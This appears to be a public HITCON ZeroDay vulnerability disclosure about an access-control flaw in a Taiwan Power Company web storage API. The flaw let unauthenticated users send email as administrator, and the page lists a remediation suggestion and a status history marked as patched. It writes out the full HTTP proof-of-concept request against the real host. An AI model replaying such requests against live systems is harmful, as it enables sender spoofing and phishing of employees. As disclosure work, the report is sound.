Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00570
- Vendor: 台灣電力公司
- Title: [Bounty] 台灣電力公司 未經身份驗證
- Introduction: 未經身份驗證
處理狀態
目前狀態
公開
Last Update : 2022/08/20
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2022/08/01 19:44:15 : 新提交 (由 ccoozzyy 更新此狀態)
- 2022/08/01 19:49:16 : 新提交 (由 ccoozzyy 更新此狀態)
- 2022/08/02 09:14:30 : 審核中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/06 15:00:57 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/07 15:43:18 : 確認已修補 (由 ccoozzyy 更新此狀態)
- 2022/08/09 13:02:18 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/16 20:08:48 : 確認已修補 (由 ccoozzyy 更新此狀態)
- 2022/08/20 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00570
- 通報者:ccoozzyy (ccoozzyy)
- 風險:中
- 類型:存取控制缺陷 (Broken Access Control)
參考資料
攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料,或連線至高權限使用者的頁面。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://webstorage.taipower.com.tw/rest/email?prefix=taipower&username=administrator
敘述
Step 1. 透過下列 API 請求封包,可以以 administrator 身份向任何人發送郵件
POST /rest/email?prefix=taipower&username=administrator HTTP/1.1
Host: webstorage.taipower.com.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://webstorage.taipower.com.tw/
Te: trailers
Connection: close
Content-Type: text/plain;charset=UTF-8
Content-Length: 63
{"msg":"msg is here 1234","email":"[email protected]"}
Step 2. 可看到寄件人為 [email protected],且來源 IP 是 61.65.236.4
影響:攻擊者可利用該漏洞寄送惡意郵件給其它員工,造成不可想像的後果。
修補建議
執行重要功能前需檢查身份是否合法
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。